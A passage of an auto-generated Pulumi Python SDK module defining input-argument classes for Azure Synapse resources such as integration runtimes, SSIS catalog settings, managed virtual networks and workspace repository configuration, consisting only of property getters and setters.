@v_net_properties.setter
def v_net_properties(self, value: Optional[pulumi.Input['IntegrationRuntimeVNetPropertiesArgs']]):
pulumi.set(self, "v_net_properties", value)
@pulumi.input_type
class IntegrationRuntimeCustomSetupScriptPropertiesArgs:
def __init__(__self__, *,
blob_container_uri: Optional[pulumi.Input[str]] = None,
sas_token: Optional[pulumi.Input['SecureStringArgs']] = None):
if blob_container_uri is not None:
pulumi.set(__self__, "blob_container_uri", blob_container_uri)
if sas_token is not None:
pulumi.set(__self__, "sas_token", sas_token)
@property
@pulumi.getter(name="blobContainerUri")
def blob_container_uri(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "blob_container_uri")
@blob_container_uri.setter
def blob_container_uri(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "blob_container_uri", value)
@property
@pulumi.getter(name="sasToken")
def sas_token(self) -> Optional[pulumi.Input['SecureStringArgs']]:
return pulumi.get(self, "sas_token")
@sas_token.setter
def sas_token(self, value: Optional[pulumi.Input['SecureStringArgs']]):
pulumi.set(self, "sas_token", value)
@pulumi.input_type
class IntegrationRuntimeDataFlowPropertiesArgs:
def __init__(__self__, *,
cleanup: Optional[pulumi.Input[bool]] = None,
compute_type: Optional[pulumi.Input[Union[str, 'DataFlowComputeType']]] = None,
core_count: Optional[pulumi.Input[int]] = None,
time_to_live: Optional[pulumi.Input[int]] = None):
if cleanup is not None:
pulumi.set(__self__, "cleanup", cleanup)
if compute_type is not None:
pulumi.set(__self__, "compute_type", compute_type)
if core_count is not None:
pulumi.set(__self__, "core_count", core_count)
if time_to_live is not None:
pulumi.set(__self__, "time_to_live", time_to_live)
@property
@pulumi.getter
def cleanup(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "cleanup")
@cleanup.setter
def cleanup(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "cleanup", value)
@property
@pulumi.getter(name="computeType")
def compute_type(self) -> Optional[pulumi.Input[Union[str, 'DataFlowComputeType']]]:
return pulumi.get(self, "compute_type")
@compute_type.setter
def compute_type(self, value: Optional[pulumi.Input[Union[str, 'DataFlowComputeType']]]):
pulumi.set(self, "compute_type", value)
@property
@pulumi.getter(name="coreCount")
def core_count(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "core_count")
@core_count.setter
def core_count(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "core_count", value)
@property
@pulumi.getter(name="timeToLive")
def time_to_live(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "time_to_live")
@time_to_live.setter
def time_to_live(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "time_to_live", value)
@pulumi.input_type
class IntegrationRuntimeDataProxyPropertiesArgs:
def __init__(__self__, *,
connect_via: Optional[pulumi.Input['EntityReferenceArgs']] = None,
path: Optional[pulumi.Input[str]] = None,
staging_linked_service: Optional[pulumi.Input['EntityReferenceArgs']] = None):
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if path is not None:
pulumi.set(__self__, "path", path)
if staging_linked_service is not None:
pulumi.set(__self__, "staging_linked_service", staging_linked_service)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['EntityReferenceArgs']]:
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['EntityReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def path(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "path")
@path.setter
def path(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "path", value)
@property
@pulumi.getter(name="stagingLinkedService")
def staging_linked_service(self) -> Optional[pulumi.Input['EntityReferenceArgs']]:
return pulumi.get(self, "staging_linked_service")
@staging_linked_service.setter
def staging_linked_service(self, value: Optional[pulumi.Input['EntityReferenceArgs']]):
pulumi.set(self, "staging_linked_service", value)
@pulumi.input_type
class IntegrationRuntimeSsisCatalogInfoArgs:
def __init__(__self__, *,
catalog_admin_password: Optional[pulumi.Input['SecureStringArgs']] = None,
catalog_admin_user_name: Optional[pulumi.Input[str]] = None,
catalog_pricing_tier: Optional[pulumi.Input[Union[str, 'IntegrationRuntimeSsisCatalogPricingTier']]] = None,
catalog_server_endpoint: Optional[pulumi.Input[str]] = None):
if catalog_admin_password is not None:
pulumi.set(__self__, "catalog_admin_password", catalog_admin_password)
if catalog_admin_user_name is not None:
pulumi.set(__self__, "catalog_admin_user_name", catalog_admin_user_name)
if catalog_pricing_tier is not None:
pulumi.set(__self__, "catalog_pricing_tier", catalog_pricing_tier)
if catalog_server_endpoint is not None:
pulumi.set(__self__, "catalog_server_endpoint", catalog_server_endpoint)
@property
@pulumi.getter(name="catalogAdminPassword")
def catalog_admin_password(self) -> Optional[pulumi.Input['SecureStringArgs']]:
return pulumi.get(self, "catalog_admin_password")
@catalog_admin_password.setter
def catalog_admin_password(self, value: Optional[pulumi.Input['SecureStringArgs']]):
pulumi.set(self, "catalog_admin_password", value)
@property
@pulumi.getter(name="catalogAdminUserName")
def catalog_admin_user_name(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "catalog_admin_user_name")
@catalog_admin_user_name.setter
def catalog_admin_user_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "catalog_admin_user_name", value)
@property
@pulumi.getter(name="catalogPricingTier")
def catalog_pricing_tier(self) -> Optional[pulumi.Input[Union[str, 'IntegrationRuntimeSsisCatalogPricingTier']]]:
return pulumi.get(self, "catalog_pricing_tier")
@catalog_pricing_tier.setter
def catalog_pricing_tier(self, value: Optional[pulumi.Input[Union[str, 'IntegrationRuntimeSsisCatalogPricingTier']]]):
pulumi.set(self, "catalog_pricing_tier", value)
@property
@pulumi.getter(name="catalogServerEndpoint")
def catalog_server_endpoint(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "catalog_server_endpoint")
@catalog_server_endpoint.setter
def catalog_server_endpoint(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "catalog_server_endpoint", value)
@pulumi.input_type
class IntegrationRuntimeSsisPropertiesArgs:
def __init__(__self__, *,
catalog_info: Optional[pulumi.Input['IntegrationRuntimeSsisCatalogInfoArgs']] = None,
custom_setup_script_properties: Optional[pulumi.Input['IntegrationRuntimeCustomSetupScriptPropertiesArgs']] = None,
data_proxy_properties: Optional[pulumi.Input['IntegrationRuntimeDataProxyPropertiesArgs']] = None,
edition: Optional[pulumi.Input[Union[str, 'IntegrationRuntimeEdition']]] = None,
express_custom_setup_properties: Optional[pulumi.Input[Sequence[pulumi.Input[Union['CmdkeySetupArgs', 'ComponentSetupArgs', 'EnvironmentVariableSetupArgs']]]]] = None,
license_type: Optional[pulumi.Input[Union[str, 'IntegrationRuntimeLicenseType']]] = None):
if catalog_info is not None:
pulumi.set(__self__, "catalog_info", catalog_info)
if custom_setup_script_properties is not None:
pulumi.set(__self__, "custom_setup_script_properties", custom_setup_script_properties)
if data_proxy_properties is not None:
pulumi.set(__self__, "data_proxy_properties", data_proxy_properties)
if edition is not None:
pulumi.set(__self__, "edition", edition)
if express_custom_setup_properties is not None:
pulumi.set(__self__, "express_custom_setup_properties", express_custom_setup_properties)
if license_type is not None:
pulumi.set(__self__, "license_type", license_type)
@property
@pulumi.getter(name="catalogInfo")
def catalog_info(self) -> Optional[pulumi.Input['IntegrationRuntimeSsisCatalogInfoArgs']]:
return pulumi.get(self, "catalog_info")
@catalog_info.setter
def catalog_info(self, value: Optional[pulumi.Input['IntegrationRuntimeSsisCatalogInfoArgs']]):
pulumi.set(self, "catalog_info", value)
@property
@pulumi.getter(name="customSetupScriptProperties")
def custom_setup_script_properties(self) -> Optional[pulumi.Input['IntegrationRuntimeCustomSetupScriptPropertiesArgs']]:
return pulumi.get(self, "custom_setup_script_properties")
@custom_setup_script_properties.setter
def custom_setup_script_properties(self, value: Optional[pulumi.Input['IntegrationRuntimeCustomSetupScriptPropertiesArgs']]):
pulumi.set(self, "custom_setup_script_properties", value)
@property
@pulumi.getter(name="dataProxyProperties")
def data_proxy_properties(self) -> Optional[pulumi.Input['IntegrationRuntimeDataProxyPropertiesArgs']]:
return pulumi.get(self, "data_proxy_properties")
@data_proxy_properties.setter
def data_proxy_properties(self, value: Optional[pulumi.Input['IntegrationRuntimeDataProxyPropertiesArgs']]):
pulumi.set(self, "data_proxy_properties", value)
@property
@pulumi.getter
def edition(self) -> Optional[pulumi.Input[Union[str, 'IntegrationRuntimeEdition']]]:
return pulumi.get(self, "edition")
@edition.setter
def edition(self, value: Optional[pulumi.Input[Union[str, 'IntegrationRuntimeEdition']]]):
pulumi.set(self, "edition", value)
@property
@pulumi.getter(name="expressCustomSetupProperties")
def express_custom_setup_properties(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[Union['CmdkeySetupArgs', 'ComponentSetupArgs', 'EnvironmentVariableSetupArgs']]]]]:
return pulumi.get(self, "express_custom_setup_properties")
@express_custom_setup_properties.setter
def express_custom_setup_properties(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[Union['CmdkeySetupArgs', 'ComponentSetupArgs', 'EnvironmentVariableSetupArgs']]]]]):
pulumi.set(self, "express_custom_setup_properties", value)
@property
@pulumi.getter(name="licenseType")
def license_type(self) -> Optional[pulumi.Input[Union[str, 'IntegrationRuntimeLicenseType']]]:
return pulumi.get(self, "license_type")
@license_type.setter
def license_type(self, value: Optional[pulumi.Input[Union[str, 'IntegrationRuntimeLicenseType']]]):
pulumi.set(self, "license_type", value)
@pulumi.input_type
class IntegrationRuntimeVNetPropertiesArgs:
def __init__(__self__, *,
public_ips: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
subnet: Optional[pulumi.Input[str]] = None,
v_net_id: Optional[pulumi.Input[str]] = None):
if public_ips is not None:
pulumi.set(__self__, "public_ips", public_ips)
if subnet is not None:
pulumi.set(__self__, "subnet", subnet)
if v_net_id is not None:
pulumi.set(__self__, "v_net_id", v_net_id)
@property
@pulumi.getter(name="publicIPs")
def public_ips(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
return pulumi.get(self, "public_ips")
@public_ips.setter
def public_ips(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "public_ips", value)
@property
@pulumi.getter
def subnet(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "subnet")
@subnet.setter
def subnet(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "subnet", value)
@property
@pulumi.getter(name="vNetId")
def v_net_id(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "v_net_id")
@v_net_id.setter
def v_net_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "v_net_id", value)
@pulumi.input_type
class LibraryInfoArgs:
def __init__(__self__, *,
container_name: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
path: Optional[pulumi.Input[str]] = None,
type: Optional[pulumi.Input[str]] = None,
uploaded_timestamp: Optional[pulumi.Input[str]] = None):
if container_name is not None:
pulumi.set(__self__, "container_name", container_name)
if name is not None:
pulumi.set(__self__, "name", name)
if path is not None:
pulumi.set(__self__, "path", path)
if type is not None:
pulumi.set(__self__, "type", type)
if uploaded_timestamp is not None:
pulumi.set(__self__, "uploaded_timestamp", uploaded_timestamp)
@property
@pulumi.getter(name="containerName")
def container_name(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "container_name")
@container_name.setter
def container_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "container_name", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def path(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "path")
@path.setter
def path(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "path", value)
@property
@pulumi.getter
def type(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "type")
@type.setter
def type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "type", value)
@property
@pulumi.getter(name="uploadedTimestamp")
def uploaded_timestamp(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "uploaded_timestamp")
@uploaded_timestamp.setter
def uploaded_timestamp(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "uploaded_timestamp", value)
@pulumi.input_type
class LibraryRequirementsArgs:
def __init__(__self__, *,
content: Optional[pulumi.Input[str]] = None,
filename: Optional[pulumi.Input[str]] = None):
if content is not None:
pulumi.set(__self__, "content", content)
if filename is not None:
pulumi.set(__self__, "filename", filename)
@property
@pulumi.getter
def content(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "content")
@content.setter
def content(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "content", value)
@property
@pulumi.getter
def filename(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "filename")
@filename.setter
def filename(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "filename", value)
@pulumi.input_type
class LinkedIntegrationRuntimeKeyAuthorizationArgs:
def __init__(__self__, *,
authorization_type: pulumi.Input[str],
key: pulumi.Input['SecureStringArgs']):
pulumi.set(__self__, "authorization_type", 'Key')
pulumi.set(__self__, "key", key)
@property
@pulumi.getter(name="authorizationType")
def authorization_type(self) -> pulumi.Input[str]:
return pulumi.get(self, "authorization_type")
@authorization_type.setter
def authorization_type(self, value: pulumi.Input[str]):
pulumi.set(self, "authorization_type", value)
@property
@pulumi.getter
def key(self) -> pulumi.Input['SecureStringArgs']:
return pulumi.get(self, "key")
@key.setter
def key(self, value: pulumi.Input['SecureStringArgs']):
pulumi.set(self, "key", value)
@pulumi.input_type
class LinkedIntegrationRuntimeRbacAuthorizationArgs:
def __init__(__self__, *,
authorization_type: pulumi.Input[str],
resource_id: pulumi.Input[str]):
pulumi.set(__self__, "authorization_type", 'RBAC')
pulumi.set(__self__, "resource_id", resource_id)
@property
@pulumi.getter(name="authorizationType")
def authorization_type(self) -> pulumi.Input[str]:
return pulumi.get(self, "authorization_type")
@authorization_type.setter
def authorization_type(self, value: pulumi.Input[str]):
pulumi.set(self, "authorization_type", value)
@property
@pulumi.getter(name="resourceId")
def resource_id(self) -> pulumi.Input[str]:
return pulumi.get(self, "resource_id")
@resource_id.setter
def resource_id(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_id", value)
@pulumi.input_type
class ManagedIdentityArgs:
def __init__(__self__, *,
type: Optional[pulumi.Input['ResourceIdentityType']] = None):
if type is not None:
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def type(self) -> Optional[pulumi.Input['ResourceIdentityType']]:
return pulumi.get(self, "type")
@type.setter
def type(self, value: Optional[pulumi.Input['ResourceIdentityType']]):
pulumi.set(self, "type", value)
@pulumi.input_type
class ManagedIntegrationRuntimeArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
compute_properties: Optional[pulumi.Input['IntegrationRuntimeComputePropertiesArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
managed_virtual_network: Optional[pulumi.Input['ManagedVirtualNetworkReferenceArgs']] = None,
ssis_properties: Optional[pulumi.Input['IntegrationRuntimeSsisPropertiesArgs']] = None):
pulumi.set(__self__, "type", 'Managed')
if compute_properties is not None:
pulumi.set(__self__, "compute_properties", compute_properties)
if description is not None:
pulumi.set(__self__, "description", description)
if managed_virtual_network is not None:
pulumi.set(__self__, "managed_virtual_network", managed_virtual_network)
if ssis_properties is not None:
pulumi.set(__self__, "ssis_properties", ssis_properties)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter(name="computeProperties")
def compute_properties(self) -> Optional[pulumi.Input['IntegrationRuntimeComputePropertiesArgs']]:
return pulumi.get(self, "compute_properties")
@compute_properties.setter
def compute_properties(self, value: Optional[pulumi.Input['IntegrationRuntimeComputePropertiesArgs']]):
pulumi.set(self, "compute_properties", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="managedVirtualNetwork")
def managed_virtual_network(self) -> Optional[pulumi.Input['ManagedVirtualNetworkReferenceArgs']]:
return pulumi.get(self, "managed_virtual_network")
@managed_virtual_network.setter
def managed_virtual_network(self, value: Optional[pulumi.Input['ManagedVirtualNetworkReferenceArgs']]):
pulumi.set(self, "managed_virtual_network", value)
@property
@pulumi.getter(name="ssisProperties")
def ssis_properties(self) -> Optional[pulumi.Input['IntegrationRuntimeSsisPropertiesArgs']]:
return pulumi.get(self, "ssis_properties")
@ssis_properties.setter
def ssis_properties(self, value: Optional[pulumi.Input['IntegrationRuntimeSsisPropertiesArgs']]):
pulumi.set(self, "ssis_properties", value)
@pulumi.input_type
class ManagedVirtualNetworkReferenceArgs:
def __init__(__self__, *,
reference_name: pulumi.Input[str],
type: pulumi.Input[str]):
pulumi.set(__self__, "reference_name", reference_name)
pulumi.set(__self__, "type", type)
@property
@pulumi.getter(name="referenceName")
def reference_name(self) -> pulumi.Input[str]:
return pulumi.get(self, "reference_name")
@reference_name.setter
def reference_name(self, value: pulumi.Input[str]):
pulumi.set(self, "reference_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@pulumi.input_type
class ManagedVirtualNetworkSettingsArgs:
def __init__(__self__, *,
allowed_aad_tenant_ids_for_linking: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
linked_access_check_on_target_resource: Optional[pulumi.Input[bool]] = None,
prevent_data_exfiltration: Optional[pulumi.Input[bool]] = None):
if allowed_aad_tenant_ids_for_linking is not None:
pulumi.set(__self__, "allowed_aad_tenant_ids_for_linking", allowed_aad_tenant_ids_for_linking)
if linked_access_check_on_target_resource is not None:
pulumi.set(__self__, "linked_access_check_on_target_resource", linked_access_check_on_target_resource)
if prevent_data_exfiltration is not None:
pulumi.set(__self__, "prevent_data_exfiltration", prevent_data_exfiltration)
@property
@pulumi.getter(name="allowedAadTenantIdsForLinking")
def allowed_aad_tenant_ids_for_linking(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
return pulumi.get(self, "allowed_aad_tenant_ids_for_linking")
@allowed_aad_tenant_ids_for_linking.setter
def allowed_aad_tenant_ids_for_linking(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "allowed_aad_tenant_ids_for_linking", value)
@property
@pulumi.getter(name="linkedAccessCheckOnTargetResource")
def linked_access_check_on_target_resource(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "linked_access_check_on_target_resource")
@linked_access_check_on_target_resource.setter
def linked_access_check_on_target_resource(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "linked_access_check_on_target_resource", value)
@property
@pulumi.getter(name="preventDataExfiltration")
def prevent_data_exfiltration(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "prevent_data_exfiltration")
@prevent_data_exfiltration.setter
def prevent_data_exfiltration(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "prevent_data_exfiltration", value)
@pulumi.input_type
class PrivateEndpointConnectionArgs:
def __init__(__self__, *,
private_link_service_connection_state: Optional[pulumi.Input['PrivateLinkServiceConnectionStateArgs']] = None):
if private_link_service_connection_state is not None:
pulumi.set(__self__, "private_link_service_connection_state", private_link_service_connection_state)
@property
@pulumi.getter(name="privateLinkServiceConnectionState")
def private_link_service_connection_state(self) -> Optional[pulumi.Input['PrivateLinkServiceConnectionStateArgs']]:
return pulumi.get(self, "private_link_service_connection_state")
@private_link_service_connection_state.setter
def private_link_service_connection_state(self, value: Optional[pulumi.Input['PrivateLinkServiceConnectionStateArgs']]):
pulumi.set(self, "private_link_service_connection_state", value)
@pulumi.input_type
class PrivateLinkServiceConnectionStateArgs:
def __init__(__self__, *,
description: Optional[pulumi.Input[str]] = None,
status: Optional[pulumi.Input[str]] = None):
if description is not None:
pulumi.set(__self__, "description", description)
if status is not None:
pulumi.set(__self__, "status", status)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def status(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "status")
@status.setter
def status(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "status", value)
@pulumi.input_type
class PurviewConfigurationArgs:
def __init__(__self__, *,
purview_resource_id: Optional[pulumi.Input[str]] = None):
if purview_resource_id is not None:
pulumi.set(__self__, "purview_resource_id", purview_resource_id)
@property
@pulumi.getter(name="purviewResourceId")
def purview_resource_id(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "purview_resource_id")
@purview_resource_id.setter
def purview_resource_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "purview_resource_id", value)
@pulumi.input_type
class SecureStringArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
value: pulumi.Input[str]):
pulumi.set(__self__, "type", 'SecureString')
pulumi.set(__self__, "value", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def value(self) -> pulumi.Input[str]:
return pulumi.get(self, "value")
@value.setter
def value(self, value: pulumi.Input[str]):
pulumi.set(self, "value", value)
@pulumi.input_type
class SelfHostedIntegrationRuntimeArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
description: Optional[pulumi.Input[str]] = None,
linked_info: Optional[pulumi.Input[Union['LinkedIntegrationRuntimeKeyAuthorizationArgs', 'LinkedIntegrationRuntimeRbacAuthorizationArgs']]] = None):
pulumi.set(__self__, "type", 'SelfHosted')
if description is not None:
pulumi.set(__self__, "description", description)
if linked_info is not None:
pulumi.set(__self__, "linked_info", linked_info)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="linkedInfo")
def linked_info(self) -> Optional[pulumi.Input[Union['LinkedIntegrationRuntimeKeyAuthorizationArgs', 'LinkedIntegrationRuntimeRbacAuthorizationArgs']]]:
return pulumi.get(self, "linked_info")
@linked_info.setter
def linked_info(self, value: Optional[pulumi.Input[Union['LinkedIntegrationRuntimeKeyAuthorizationArgs', 'LinkedIntegrationRuntimeRbacAuthorizationArgs']]]):
pulumi.set(self, "linked_info", value)
@pulumi.input_type
class SkuArgs:
def __init__(__self__, *,
capacity: Optional[pulumi.Input[int]] = None,
name: Optional[pulumi.Input[str]] = None,
tier: Optional[pulumi.Input[str]] = None):
if capacity is not None:
pulumi.set(__self__, "capacity", capacity)
if name is not None:
pulumi.set(__self__, "name", name)
if tier is not None:
pulumi.set(__self__, "tier", tier)
@property
@pulumi.getter
def capacity(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "capacity")
@capacity.setter
def capacity(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "capacity", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def tier(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "tier")
@tier.setter
def tier(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "tier", value)
@pulumi.input_type
class SqlPoolVulnerabilityAssessmentRuleBaselineItemArgs:
def __init__(__self__, *,
result: pulumi.Input[Sequence[pulumi.Input[str]]]):
pulumi.set(__self__, "result", result)
@property
@pulumi.getter
def result(self) -> pulumi.Input[Sequence[pulumi.Input[str]]]:
return pulumi.get(self, "result")
@result.setter
def result(self, value: pulumi.Input[Sequence[pulumi.Input[str]]]):
pulumi.set(self, "result", value)
@pulumi.input_type
class VirtualNetworkProfileArgs:
def __init__(__self__, *,
compute_subnet_id: Optional[pulumi.Input[str]] = None):
if compute_subnet_id is not None:
pulumi.set(__self__, "compute_subnet_id", compute_subnet_id)
@property
@pulumi.getter(name="computeSubnetId")
def compute_subnet_id(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "compute_subnet_id")
@compute_subnet_id.setter
def compute_subnet_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "compute_subnet_id", value)
@pulumi.input_type
class VulnerabilityAssessmentRecurringScansPropertiesArgs:
def __init__(__self__, *,
email_subscription_admins: Optional[pulumi.Input[bool]] = None,
emails: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
is_enabled: Optional[pulumi.Input[bool]] = None):
if email_subscription_admins is None:
email_subscription_admins = True
if email_subscription_admins is not None:
pulumi.set(__self__, "email_subscription_admins", email_subscription_admins)
if emails is not None:
pulumi.set(__self__, "emails", emails)
if is_enabled is not None:
pulumi.set(__self__, "is_enabled", is_enabled)
@property
@pulumi.getter(name="emailSubscriptionAdmins")
def email_subscription_admins(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "email_subscription_admins")
@email_subscription_admins.setter
def email_subscription_admins(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "email_subscription_admins", value)
@property
@pulumi.getter
def emails(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
return pulumi.get(self, "emails")
@emails.setter
def emails(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "emails", value)
@property
@pulumi.getter(name="isEnabled")
def is_enabled(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "is_enabled")
@is_enabled.setter
def is_enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_enabled", value)
@pulumi.input_type
class WorkspaceKeyDetailsArgs:
def __init__(__self__, *,
key_vault_url: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None):
if key_vault_url is not None:
pulumi.set(__self__, "key_vault_url", key_vault_url)
if name is not None:
pulumi.set(__self__, "name", name)
@property
@pulumi.getter(name="keyVaultUrl")
def key_vault_url(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "key_vault_url")
@key_vault_url.setter
def key_vault_url(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "key_vault_url", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@pulumi.input_type
class WorkspaceRepositoryConfigurationArgs:
def __init__(__self__, *,
account_name: Optional[pulumi.Input[str]] = None,
client_id: Optional[pulumi.Input[str]] = None,
client_secret: Optional[pulumi.Input['GitHubClientSecretArgs']] = None,
collaboration_branch: Optional[pulumi.Input[str]] = None,
host_name: Optional[pulumi.Input[str]] = None,
last_commit_id: Optional[pulumi.Input[str]] = None,
project_name: Optional[pulumi.Input[str]] = None,
repository_name: Optional[pulumi.Input[str]] = None,
root_folder: Optional[pulumi.Input[str]] = None,
tenant_id: Optional[pulumi.Input[str]] = None,
type: Optional[pulumi.Input[str]] = None):
if account_name is not None:
pulumi.set(__self__, "account_name", account_name)
if client_id is not None:
pulumi.set(__self__, "client_id", client_id)
if client_secret is not None:
pulumi.set(__self__, "client_secret", client_secret)
if collaboration_branch is not None:
pulumi.set(__self__, "collaboration_branch", collaboration_branch)
if host_name is not None:
pulumi.set(__self__, "host_name", host_name)
if last_commit_id is not None:
pulumi.set(__self__, "last_commit_id", last_commit_id)
if project_name is not None:
pulumi.set(__self__, "project_name", project_name)
if repository_name is not None:
pulumi.set(__self__, "repository_name", repository_name)
if root_folder is not None:
pulumi.set(__self__, "root_folder", root_folder)
if tenant_id is not None:
pulumi.set(__self__, "tenant_id", tenant_id)
if type is not None:
pulumi.set(__self__, "type", type)
@property
@pulumi.getter(name="accountName")
def account_name(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "account_name")
@account_name.setter
def account_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "account_name", value)
@property
@pulumi.getter(name="clientId")
def client_id(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "client_id")
@client_id.setter
def client_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "client_id", value)
@property
@pulumi.getter(name="clientSecret")
def client_secret(self) -> Optional[pulumi.Input['GitHubClientSecretArgs']]:
return pulumi.get(self, "client_secret")
@client_secret.setter
def client_secret(self, value: Optional[pulumi.Input['GitHubClientSecretArgs']]):
pulumi.set(self, "client_secret", value)
@property
@pulumi.getter(name="collaborationBranch")
def collaboration_branch(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "collaboration_branch")
@collaboration_branch.setter
def collaboration_branch(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "collaboration_branch", value)
@property
@pulumi.getter(name="hostName")
def host_name(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "host_name")
@host_name.setter
def host_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "host_name", value)
@property
@pulumi.getter(name="lastCommitId")
def last_commit_id(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "last_commit_id")
@last_commit_id.setter
def last_commit_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "last_commit_id", value)
@property
